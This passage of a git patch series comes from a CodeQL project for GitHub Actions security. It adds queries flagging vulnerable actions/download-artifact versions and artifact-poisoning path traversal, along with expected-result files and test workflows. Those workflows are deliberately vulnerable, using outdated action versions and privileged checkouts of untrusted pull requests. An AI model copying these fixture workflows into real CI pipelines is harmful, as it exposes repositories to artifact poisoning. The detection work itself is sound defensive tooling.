"${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | sed -f config foo.md > bar.md\n | +| .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | python test.py | diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected index 57d7ff9d64b0..da10247f1e0f 100644 --- a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected +++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected @@ -13,6 +13,8 @@ edges | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | | | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | | | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | provenance | | +| .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | provenance | | +| .github/workflows/artifactpoisoning82.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning82.yml:31:14:31:27 | python test.py | provenance | | nodes | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | semmle.label | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | @@ -42,5 +44,10 @@ nodes | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | semmle.label | sed -f config foo.md > bar.md\n | +| .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | semmle.label | python test.py | +| .github/workflows/artifactpoisoning82.yml:28:9:31:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/artifactpoisoning82.yml:31:14:31:27 | python test.py | semmle.label | python test.py | subpaths #select +| .github/workflows/artifactpoisoning82.yml:31:14:31:27 | python test.py | .github/workflows/artifactpoisoning82.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning82.yml:31:14:31:27 | python test.py | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning82.yml:31:14:31:27 | python test.py | python test.py | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 092a7187951f..93e816fe1f90 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected @@ -26,6 +26,12 @@ edges | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:15:9:18:6 | Run Step | | .github/workflows/artifactpoisoning53.yml:15:9:18:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:9:23:29 | Run Step | | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:16:9:18:40 | Run Step | +| .github/workflows/artifactpoisoning81.yml:11:9:14:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:14:9:16:6 | Run Step | +| .github/workflows/artifactpoisoning81.yml:14:9:16:6 | Run Step | .github/workflows/artifactpoisoning81.yml:16:9:22:2 | Uses Step | +| .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:31:9:31:28 | Run Step | +| .github/workflows/artifactpoisoning82.yml:11:9:14:6 | Uses Step | .github/workflows/artifactpoisoning82.yml:14:9:16:6 | Run Step | +| .github/workflows/artifactpoisoning82.yml:14:9:16:6 | Run Step | .github/workflows/artifactpoisoning82.yml:16:9:22:2 | Uses Step | +| .github/workflows/artifactpoisoning82.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning82.yml:31:9:31:28 | Run Step | | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:27:9:32:6 | Uses Step | | .github/workflows/auto_ci.yml:27:9:32:6 | Uses Step | .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | | .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | .github/workflows/auto_ci.yml:37:9:40:6 | Run Step | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected index 05931dfe3121..9f3e500817a4 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected @@ -1,3 +1,5 @@ +| .github/workflows/artifactpoisoning81.yml:11:9:14:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/artifactpoisoning82.yml:11:9:14:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/dependabot1.yml:15:9:19:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/dependabot1.yml:39:9:43:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/dependabot2.yml:33:9:38:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | From 2b55d79c93a98f420613999e28475a1f0a9b04ab Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 31 Jul 2024 18:29:17 +0200 Subject: [PATCH 438/707] feat(queries): Add query to report vulnerable 3rd party actions --- .../CWE-1395/UseOfKnownVulnerableAction.ql | 38 +++++++++++++++++++ .../CWE-1395/.github/workflows/test1.yml | 23 +++++++++++ .../UseOfKnownVulnerableAction.expected | 9 +++++ .../CWE-1395/UseOfKnownVulnerableAction.qlref | 2 + 4 files changed, 72 insertions(+) create mode 100644 ql/src/Security/CWE-1395/UseOfKnownVulnerableAction.ql create mode 100644 ql/test/query-tests/Security/CWE-1395/.github/workflows/test1.yml create mode 100644 ql/test/query-tests/Security/CWE-1395/UseOfKnownVulnerableAction.expected create mode 100644 ql/test/query-tests/Security/CWE-1395/UseOfKnownVulnerableAction.qlref diff --git a/ql/src/Security/CWE-1395/UseOfKnownVulnerableAction.ql b/ql/src/Security/CWE-1395/UseOfKnownVulnerableAction.ql new file mode 100644 index 000000000000..5767619a5ca4 --- /dev/null +++ b/ql/src/Security/CWE-1395/UseOfKnownVulnerableAction.ql @@ -0,0 +1,38 @@ +/** + * @name Use of known vulnerable 3rd party action. + * @description The workflow is using a known vulnerable 3rd party action. + * @kind problem + * @problem.severity error + * @security-severity 7.5 + * @precision high + * @id actions/vulnerable-action + * @tags actions + * security + * external/cwe/cwe-1395 + */ + +import actions + +// gh api /repos/actions/download-artifact/tags --jq 'map({name: .name, sha: .commit.sha})' --paginate +from UsesStep step +where + step.getCallee() = "actions/download-artifact" and + ( + step.getVersion() = + [ + "4.1.6", "4.1.5", "4.1.4", "4.1.3", "4.1.2", "4.1.1", "4.1.0", "4.0.0", "3.0.2", "3.0.1", + "3.0.0", "3", "3-node20", "2.1.1", "2.1.0", "2.0.10", "2.0.9", "2.0.8", "2.0.7", "2.0.6", + "2.0.5", "2.0.4", "2.0.3", "2.0.2", "2.0.1", "2.0", "2", "1.0.0", "1", "1.0.0", + ] + or + step.getVersion() + .matches([ + "9c19ed7f", "8caf195a", "c850b930", "87c55149", "eaceaf80", "6b208ae0", "f44cd7b4", + "7a1cd321", "9bc31d5c", "9782bd6a", "fb598a63", "9bc31d5c", "246d7188", "cbed621e", + "f023be2c", "3be87be1", "158ca71f", "4a7a7112", "f144d3c3", "f8e41fbf", "c3f5d00c", + "b3cedea9", "80d2d402", "381af06b", "1ac47ba4", "1de1dea8", "cbed621e", "18f0f591", + "18f0f591", "18f0f591", + ] + "%") + ) +select step, "The workflow is using a known vulnerable version ($@) of the $@ action.", step, + step.getVersion(), step, step.getCallee() diff --git a/ql/test/query-tests/Security/CWE-1395/.github/workflows/test1.yml b/ql/test/query-tests/Security/CWE-1395/.github/workflows/test1.yml new file mode 100644 index 000000000000..39b1af673a1c --- /dev/null +++ b/ql/test/query-tests/Security/CWE-1395/.github/workflows/test1.yml @@ -0,0 +1,23 @@ +name: Test + +on: + issues: + +jobs: + test1: + runs-on: ubuntu-latest + steps: + - uses: actions/download-artifact@v1 + - uses: actions/download-artifact@v1.0.0 + - uses: actions/download-artifact@v2 + - uses: actions/download-artifact@v2.1.0 + - uses: actions/download-artifact@v3 + - uses: actions/download-artifact@v3.0.2 + - uses: actions/download-artifact@v4.1.0 + - uses: actions/download-artifact@87c55149d96e628cc2ef7e6fc2aab372015aec85 # v4.1.3 + - uses: actions/download-artifact@9bc31d5ccc31df68ecc42ccf4149144866c47d8a # v3.0.2 + - uses: actions/download-artifact@v4 # SECURE + - uses: actions/download-artifact@v4.1.7 # SECURE + - uses: actions/download-artifact@v4.1.8 # SECURE + - uses: actions/download-artifact@fa0a91b85d4f404e444e00e005971372dc801d16 # v4.1.8 SECURE + - uses: actions/download-artifact@65a9edc5881444af0b9093a5e628f2fe47ea3b2e # v4.1.7 SECURE diff --git a/ql/test/query-tests/Security/CWE-1395/UseOfKnownVulnerableAction.expected b/ql/test/query-tests/Security/CWE-1395/UseOfKnownVulnerableAction.expected new file mode 100644 index 000000000000..0a8c593cd86a --- /dev/null +++ b/ql/test/query-tests/Security/CWE-1395/UseOfKnownVulnerableAction.expected @@ -0,0 +1,9 @@ +| .github/workflows/test1.yml:10:9:11:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. | .github/workflows/test1.yml:10:9:11:6 | Uses Step | 1 | .github/workflows/test1.yml:10:9:11:6 | Uses Step | actions/download-artifact | +| .github/workflows/test1.yml:11:9:12:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. | .github/workflows/test1.yml:11:9:12:6 | Uses Step | 1.0.0 | .github/workflows/test1.yml:11:9:12:6 | Uses Step | actions/download-artifact | +| .github/workflows/test1.yml:12:9:13:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. | .github/workflows/test1.yml:12:9:13:6 | Uses Step | 2 | .github/workflows/test1.yml:12:9:13:6 | Uses Step | actions/download-artifact | +| .github/workflows/test1.yml:13:9:14:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. | .github/workflows/test1.yml:13:9:14:6 | Uses Step | 2.1.0 | .github/workflows/test1.yml:13:9:14:6 | Uses Step | actions/download-artifact | +| .github/workflows/test1.yml:14:9:15:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. | .github/workflows/test1.yml:14:9:15:6 | Uses Step | 3 | .github/workflows/test1.yml:14:9:15:6 | Uses Step | actions/download-artifact | +| .github/workflows/test1.yml:15:9:16:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. | .github/workflows/test1.yml:15:9:16:6 | Uses Step | 3.0.2 | .github/workflows/test1.yml:15:9:16:6 | Uses Step | actions/download-artifact | +| .github/workflows/test1.yml:16:9:17:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. | .github/workflows/test1.yml:16:9:17:6 | Uses Step | 4.1.0 | .github/workflows/test1.yml:16:9:17:6 | Uses Step | actions/download-artifact | +| .github/workflows/test1.yml:17:9:18:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. | .github/workflows/test1.yml:17:9:18:6 | Uses Step | 87c55149d96e628cc2ef7e6fc2aab372015aec85 | .github/workflows/test1.yml:17:9:18:6 | Uses Step | actions/download-artifact | +| .github/workflows/test1.yml:18:9:19:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. | .github/workflows/test1.yml:18:9:19:6 | Uses Step | 9bc31d5ccc31df68ecc42ccf4149144866c47d8a | .github/workflows/test1.yml:18:9:19:6 | Uses Step | actions/download-artifact | diff --git a/ql/test/query-tests/Security/CWE-1395/UseOfKnownVulnerableAction.qlref b/ql/test/query-tests/Security/CWE-1395/UseOfKnownVulnerableAction.qlref new file mode 100644 index 000000000000..c9bd66e4dd06 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-1395/UseOfKnownVulnerableAction.qlref @@ -0,0 +1,2 @@ +Security/CWE-1395/UseOfKnownVulnerableAction.ql + From 483f6229ff5f6cf8e3551588fe94b4e474424c0a Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 31 Jul 2024 23:02:52 +0200 Subject: [PATCH 439/707] refactor: Create abstract class for known vulnerable actions --- .../CWE-1395/UseOfKnownVulnerableAction.ql | 55 +++++++++++-------- .../UseOfKnownVulnerableAction.expected | 18 +++--- 2 files changed, 42 insertions(+), 31 deletions(-) diff --git a/ql/src/Security/CWE-1395/UseOfKnownVulnerableAction.ql b/ql/src/Security/CWE-1395/UseOfKnownVulnerableAction.ql index 5767619a5ca4..16404edc5000 100644 --- a/ql/src/Security/CWE-1395/UseOfKnownVulnerableAction.ql +++ b/ql/src/Security/CWE-1395/UseOfKnownVulnerableAction.ql @@ -13,26 +13,37 @@ import actions +abstract class KnownVulnerableAction extends UsesStep { + abstract string getFixedVersion(); +} + +class ActionsDownloadArtifact extends KnownVulnerableAction { + ActionsDownloadArtifact() { + this.getCallee() = "actions/download-artifact" and + ( + this.getVersion() = + [ + "4.1.6", "4.1.5", "4.1.4", "4.1.3", "4.1.2", "4.1.1", "4.1.0", "4.0.0", "3.0.2", "3.0.1", + "3.0.0", "3", "3-node20", "2.1.1", "2.1.0", "2.0.10", "2.0.9", "2.0.8", "2.0.7", "2.0.6", + "2.0.5", "2.0.4", "2.0.3", "2.0.2", "2.0.1", "2.0", "2", "1.0.0", "1", "1.0.0", + ] + or + this.getVersion() + .matches([ + "9c19ed7f", "8caf195a", "c850b930", "87c55149", "eaceaf80", "6b208ae0", "f44cd7b4", + "7a1cd321", "9bc31d5c", "9782bd6a", "fb598a63", "9bc31d5c", "246d7188", "cbed621e", + "f023be2c", "3be87be1", "158ca71f", "4a7a7112", "f144d3c3", "f8e41fbf", "c3f5d00c", + "b3cedea9", "80d2d402", "381af06b", "1ac47ba4", "1de1dea8", "cbed621e", "18f0f591", + "18f0f591", "18f0f591", + ] + "%") + ) + } + + override string getFixedVersion() { result = "4.1.7" } +} + // gh api /repos/actions/download-artifact/tags --jq 'map({name: .name, sha: .commit.sha})' --paginate -from UsesStep step -where - step.getCallee() = "actions/download-artifact" and - ( - step.getVersion() = - [ - "4.1.6", "4.1.5", "4.1.4", "4.1.3", "4.1.2", "4.1.1", "4.1.0", "4.0.0", "3.0.2", "3.0.1", - "3.0.0", "3", "3-node20", "2.1.1", "2.1.0", "2.0.10", "2.0.9", "2.0.8", "2.0.7", "2.0.6", - "2.0.5", "2.0.4", "2.0.3", "2.0.2", "2.0.1", "2.0", "2", "1.0.0", "1", "1.0.0", - ] - or - step.getVersion() - .matches([ - "9c19ed7f", "8caf195a", "c850b930", "87c55149", "eaceaf80", "6b208ae0", "f44cd7b4", - "7a1cd321", "9bc31d5c", "9782bd6a", "fb598a63", "9bc31d5c", "246d7188", "cbed621e", - "f023be2c", "3be87be1", "158ca71f", "4a7a7112", "f144d3c3", "f8e41fbf", "c3f5d00c", - "b3cedea9", "80d2d402", "381af06b", "1ac47ba4", "1de1dea8", "cbed621e", "18f0f591", - "18f0f591", "18f0f591", - ] + "%") - ) -select step, "The workflow is using a known vulnerable version ($@) of the $@ action.", step, - step.getVersion(), step, step.getCallee() +from KnownVulnerableAction step +select step, + "The workflow is using a known vulnerable version ($@) of the $@ action. Update it to $@", step, + step.getVersion(), step, step.getCallee(), step, step.getFixedVersion() diff --git a/ql/test/query-tests/Security/CWE-1395/UseOfKnownVulnerableAction.expected b/ql/test/query-tests/Security/CWE-1395/UseOfKnownVulnerableAction.expected index 0a8c593cd86a..4749fc358173 100644 --- a/ql/test/query-tests/Security/CWE-1395/UseOfKnownVulnerableAction.expected +++ b/ql/test/query-tests/Security/CWE-1395/UseOfKnownVulnerableAction.expected @@ -1,9 +1,9 @@ -| .github/workflows/test1.yml:10:9:11:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. | .github/workflows/test1.yml:10:9:11:6 | Uses Step | 1 | .github/workflows/test1.yml:10:9:11:6 | Uses Step | actions/download-artifact | -| .github/workflows/test1.yml:11:9:12:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. | .github/workflows/test1.yml:11:9:12:6 | Uses Step | 1.0.0 | .github/workflows/test1.yml:11:9:12:6 | Uses Step | actions/download-artifact | -| .github/workflows/test1.yml:12:9:13:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. | .github/workflows/test1.yml:12:9:13:6 | Uses Step | 2 | .github/workflows/test1.yml:12:9:13:6 | Uses Step | actions/download-artifact | -| .github/workflows/test1.yml:13:9:14:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. | .github/workflows/test1.yml:13:9:14:6 | Uses Step | 2.1.0 | .github/workflows/test1.yml:13:9:14:6 | Uses Step | actions/download-artifact | -| .github/workflows/test1.yml:14:9:15:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. | .github/workflows/test1.yml:14:9:15:6 | Uses Step | 3 | .github/workflows/test1.yml:14:9:15:6 | Uses Step | actions/download-artifact | -| .github/workflows/test1.yml:15:9:16:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. | .github/workflows/test1.yml:15:9:16:6 | Uses Step | 3.0.2 | .github/workflows/test1.yml:15:9:16:6 | Uses Step | actions/download-artifact | -| .github/workflows/test1.yml:16:9:17:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. | .github/workflows/test1.yml:16:9:17:6 | Uses Step | 4.1.0 | .github/workflows/test1.yml:16:9:17:6 | Uses Step | actions/download-artifact | -| .github/workflows/test1.yml:17:9:18:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. | .github/workflows/test1.yml:17:9:18:6 | Uses Step | 87c55149d96e628cc2ef7e6fc2aab372015aec85 | .github/workflows/test1.yml:17:9:18:6 | Uses Step | actions/download-artifact | -| .github/workflows/test1.yml:18:9:19:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. | .github/workflows/test1.yml:18:9:19:6 | Uses Step | 9bc31d5ccc31df68ecc42ccf4149144866c47d8a | .github/workflows/test1.yml:18:9:19:6 | Uses Step | actions/download-artifact | +| .github/workflows/test1.yml:10:9:11:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. Update it to $@ | .github/workflows/test1.yml:10:9:11:6 | Uses Step | 1 | .github/workflows/test1.yml:10:9:11:6 | Uses Step | actions/download-artifact | .github/workflows/test1.yml:10:9:11:6 | Uses Step | 4.1.7 | +| .github/workflows/test1.yml:11:9:12:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. Update it to $@ | .github/workflows/test1.yml:11:9:12:6 | Uses Step | 1.0.0 | .github/workflows/test1.yml:11:9:12:6 | Uses Step | actions/download-artifact | .github/workflows/test1.yml:11:9:12:6 | Uses Step | 4.1.7 | +| .github/workflows/test1.yml:12:9:13:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. Update it to $@ | .github/workflows/test1.yml:12:9:13:6 | Uses Step | 2 | .github/workflows/test1.yml:12:9:13:6 | Uses Step | actions/download-artifact | .github/workflows/test1.yml:12:9:13:6 | Uses Step | 4.1.7 | +| .github/workflows/test1.yml:13:9:14:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. Update it to $@ | .github/workflows/test1.yml:13:9:14:6 | Uses Step | 2.1.0 | .github/workflows/test1.yml:13:9:14:6 | Uses Step | actions/download-artifact | .github/workflows/test1.yml:13:9:14:6 | Uses Step | 4.1.7 | +| .github/workflows/test1.yml:14:9:15:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. Update it to $@ | .github/workflows/test1.yml:14:9:15:6 | Uses Step | 3 | .github/workflows/test1.yml:14:9:15:6 | Uses Step | actions/download-artifact | .github/workflows/test1.yml:14:9:15:6 | Uses Step | 4.1.7 | +| .github/workflows/test1.yml:15:9:16:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. Update it to $@ | .github/workflows/test1.yml:15:9:16:6 | Uses Step | 3.0.2 | .github/workflows/test1.yml:15:9:16:6 | Uses Step | actions/download-artifact | .github/workflows/test1.yml:15:9:16:6 | Uses Step | 4.1.7 | +| .github/workflows/test1.yml:16:9:17:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. Update it to $@ | .github/workflows/test1.yml:16:9:17:6 | Uses Step | 4.1.0 | .github/workflows/test1.yml:16:9:17:6 | Uses Step | actions/download-artifact | .github/workflows/test1.yml:16:9:17:6 | Uses Step | 4.1.7 | +| .github/workflows/test1.yml:17:9:18:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. Update it to $@ | .github/workflows/test1.yml:17:9:18:6 | Uses Step | 87c55149d96e628cc2ef7e6fc2aab372015aec85 | .github/workflows/test1.yml:17:9:18:6 | Uses Step | actions/download-artifact | .github/workflows/test1.yml:17:9:18:6 | Uses Step | 4.1.7 | +| .github/workflows/test1.yml:18:9:19:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. Update it to $@ | .github/workflows/test1.yml:18:9:19:6 | Uses Step | 9bc31d5ccc31df68ecc42ccf4149144866c47d8a | .github/workflows/test1.yml:18:9:19:6 | Uses Step | actions/download-artifact | .github/workflows/test1.yml:18:9:19:6 | Uses Step | 4.1.7 | From 5f1884aa32780aa6edd0aa3e4ad90fd18f705761 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 31 Jul 2024 23:03:34 +0200 Subject: [PATCH 440/707] feat(queries): Add new queries to report path traversal via artifact poisoning --- .../CWE-829/ArtifactPoisoningPathTraversal.ql | 56 +++++++++++++++++++ .../.github/workflows/artifactpoisoning81.yml | 2 +- .../ArtifactPoisoningPathTraversal.expected | 1 + .../ArtifactPoisoningPathTraversal.qlref | 2 + 4 files changed, 60 insertions(+), 1 deletion(-) create mode 100644 ql/src/Security/CWE-829/ArtifactPoisoningPathTraversal.ql create mode 100644 ql/test/query-tests/Security/CWE-829/ArtifactPoisoningPathTraversal.expected create mode 100644 ql/test/query-tests/Security/CWE-829/ArtifactPoisoningPathTraversal.qlref diff --git a/ql/src/Security/CWE-829/ArtifactPoisoningPathTraversal.ql b/ql/src/Security/CWE-829/ArtifactPoisoningPathTraversal.ql new file mode 100644 index 000000000000..bf7623ef2600 --- /dev/null +++ b/ql/src/Security/CWE-829/ArtifactPoisoningPathTraversal.ql @@ -0,0 +1,56 @@ +/** + * @name Artifact Poisoning (Path Traversal). + * @description An attacker may be able to poison the workflow's artifacts and influence on consequent steps. + * @kind problem + * @problem.severity error + * @precision very-high + * @security-severity 9 + * @id actions/artifact-poisoning/path-traversal + * @tags actions + * security + * experimental + * external/cwe/cwe-829 + */ + +import actions +import codeql.actions.security.PoisonableSteps + +from UsesStep download +where + download.getCallee() = "actions/download-artifact" and + download.getCallee() = "actions/download-artifact" and + ( + download.getVersion() = + [ + "4.1.6", "4.1.5", "4.1.4", "4.1.3", "4.1.2", "4.1.1", "4.1.0", "4.0.0", "3.0.2", "3.0.1", + "3.0.0", "3", "3-node20", "2.1.1", "2.1.0", "2.0.10", "2.0.9", "2.0.8", "2.0.7", "2.0.6", + "2.0.5", "2.0.4", "2.0.3", "2.0.2", "2.0.1", "2.0", "2", "1.0.0", "1", "1.0.0", + ] + or + download + .getVersion() + .matches([ + "9c19ed7f", "8caf195a", "c850b930", "87c55149", "eaceaf80", "6b208ae0", "f44cd7b4", + "7a1cd321", "9bc31d5c", "9782bd6a", "fb598a63", "9bc31d5c", "246d7188", "cbed621e", + "f023be2c", "3be87be1", "158ca71f", "4a7a7112", "f144d3c3", "f8e41fbf", "c3f5d00c", + "b3cedea9", "80d2d402", "381af06b", "1ac47ba4", "1de1dea8", "cbed621e", "18f0f591", + "18f0f591", "18f0f591", + ] + "%") + ) and + ( + // exists a poisonable upload artifact in the same workflow + exists(UsesStep checkout, PoisonableStep poison, UsesStep upload | + download.getEnclosingWorkflow().getAJob().(LocalJob).getAStep() = checkout and + download.getEnclosingJob().isPrivilegedExternallyTriggerable() and + checkout.getCallee() = "actions/checkout" and + checkout.getAFollowingStep() = poison and + poison.getAFollowingStep() = upload and + upload.getCallee() = "actions/upload-artifact" + ) + or + // upload artifact is not used in the same workflow + not exists(UsesStep upload | + download.getEnclosingWorkflow().getAJob().(LocalJob).getAStep() = upload + ) + ) +select download, "Potential artifact poisoning" diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning81.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning81.yml index 7aa190007d8a..768f244c210f 100644 --- a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning81.yml +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning81.yml @@ -25,7 +25,7 @@ jobs: permissions: contents: write steps: - - uses: actions/download-artifact@v4 + - uses: actions/download-artifact@v3 with: name: results - run: python test.py diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningPathTraversal.expected b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningPathTraversal.expected new file mode 100644 index 000000000000..10c1cd1ded6d --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningPathTraversal.expected @@ -0,0 +1 @@ +| .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | Potential artifact poisoning | diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningPathTraversal.qlref b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningPathTraversal.qlref new file mode 100644 index 000000000000..7082dbada272 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningPathTraversal.qlref @@ -0,0 +1,2 @@ +Security/CWE-829/ArtifactPoisoningPathTraversal.ql + From 6cfec0d24574b46b9aa306547223bcff45f47439 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 1 Aug 2024 11:37:00 +0200 Subject: [PATCH 441/707] feat(queries): Improve Use Of Vulnerable Actions query Move all info to a MaD config file so its easier to mantain Add other vulnerable actions --- ql/lib/codeql/actions/ast/internal/Ast.qll | 14 +- ql/lib/codeql/actions/config/Config.qll | 14 + .../actions/config/ConfigExtensions.qll | 7 + .../codeql/actions/dataflow/FlowSources.qll | 78 +-- .../UseOfKnownVulnerableActionQuery.qll | 23 + ql/lib/ext/config/vulnerable_actions.yml | 641 ++++++++++++++++++ ql/lib/qlpack.yml | 2 +- .../CWE-1395/UseOfKnownVulnerableAction.ql | 31 +- .../CWE-829/ArtifactPoisoningPathTraversal.ql | 23 +- ql/src/qlpack.yml | 2 +- .../UseOfKnownVulnerableAction.expected | 14 +- .../CWE-829/UnpinnedActionsTag.expected | 38 +- 12 files changed, 738 insertions(+), 149 deletions(-) create mode 100644 ql/lib/codeql/actions/security/UseOfKnownVulnerableActionQuery.qll create mode 100644 ql/lib/ext/config/vulnerable_actions.yml diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 